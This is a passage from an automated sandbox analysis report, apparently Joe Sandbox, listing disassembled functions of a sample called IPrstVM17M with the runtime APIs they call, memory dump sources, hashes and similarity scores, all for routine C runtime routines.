                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: __current_exception__current_exception_contextterminate
                                                      • String ID: csm
                                                      • API String ID: 2542180945-1018135373
                                                      • Opcode ID: c24f42b788f90b09a0bfd4f7690475f633f5f2a6da94251d278b19f0f45dab9f
                                                      • Instruction ID: d6b5d7648061a53994340b5a9376c675217feed33f11a66a6ecfc22be9911773
                                                      • Opcode Fuzzy Hash: c24f42b788f90b09a0bfd4f7690475f633f5f2a6da94251d278b19f0f45dab9f
                                                      • Instruction Fuzzy Hash: 7A113975A112198FCF04DF98C480AADB7F1BF49314B148155E809AB343E734EC91CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0020A299 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __current_exception.VCRUNTIME140 ref: 0020A2D8
                                                      • __current_exception_context.VCRUNTIME140 ref: 0020A2E2
                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A2E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: __current_exception__current_exception_contextterminate
                                                      • String ID: csm
                                                      • API String ID: 2542180945-1018135373
                                                      • Opcode ID: 4c2b7c61f837ca528a6e4122a48878ee25e8aa18a4c9cb138a4d4c386fe13609
                                                      • Instruction ID: 508fcbcb1a1a32476924fe1c04804e9a1115ae3f37edcac9f083b9a8b5fb2777
                                                      • Opcode Fuzzy Hash: 4c2b7c61f837ca528a6e4122a48878ee25e8aa18a4c9cb138a4d4c386fe13609
                                                      • Instruction Fuzzy Hash: 79F082750203168FCB306F699004019B76CAE12721BD40627E8448B693D7B1AD71DBD3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00207BE0 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 00207C3F
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207CB4
                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,00000000), ref: 00207CDF
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00207CF8
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID:
                                                      • API String ID: 1155477157-0
                                                      • Opcode ID: 733bd51efbfa6c4768ca36ea1675e804837944077afc979edd42ea566f0028af
                                                      • Instruction ID: d2b72a8befe2b3f09d89d392e144aa186361271f83651506d129acd8ce0d20de
                                                      • Opcode Fuzzy Hash: 733bd51efbfa6c4768ca36ea1675e804837944077afc979edd42ea566f0028af
                                                      • Instruction Fuzzy Hash: 2E31E8B2E143119BD7109F74D88565AB7E4AF54360F500736EC2AC32D2E771A964C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00202830 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,3BC7ADCC), ref: 00202872
                                                      • srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 00202879
                                                      • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 0020289F
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(009BF490), ref: 00202975
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo_noreturn_time64randsrand
                                                      • String ID:
                                                      • API String ID: 2329022785-0
                                                      • Opcode ID: 86ff91e9e87d2cd4a9b93f878e77ce531452a53efab5a1b0d77bca1e7f0d8d09
                                                      • Instruction ID: da1052c9502e7e34493920d71e655b3372887a4f763dd3e944abd1cb198283be
                                                      • Opcode Fuzzy Hash: 86ff91e9e87d2cd4a9b93f878e77ce531452a53efab5a1b0d77bca1e7f0d8d09
                                                      • Instruction Fuzzy Hash: 2A41E871A10209DFD708CF68D898BADFBB5FF58300F248219E815977D2CB75A958CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00207E40 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 00207E97
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00207EFF
                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 00207F26
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00207F45
                                                        • Part of subcall function 00209759: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00208010,00000001,?,?,?), ref: 0020976E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4423755710.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                      • Associated: 00000000.00000002.4423737632.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423786412.0000000000212000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.4423800033.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_200000_IPrstVM17M.jbxd
                                                      Similarity
                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                      • String ID:
                                                      • API String ID: 1155477157-0
                                                      • Opcode ID: 9130259d277ee496008a78ae5a9a7b7bfdd3a1f1a1129c72af9335ff4a0b5b60
                                                      • Instruction ID: 0f14102c7ad04828478221ac3b5d41dd082a894085b72c07b0a7279744c770bf
                                                      • Opcode Fuzzy Hash: 9130259d277ee496008a78ae5a9a7b7bfdd3a1f1a1129c72af9335ff4a0b5b60
                                                      • Instruction Fuzzy Hash: AC310872D253018BD7149F28D88476ABB99AF55310F1002AAEC15CB2D3EB71D9748791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%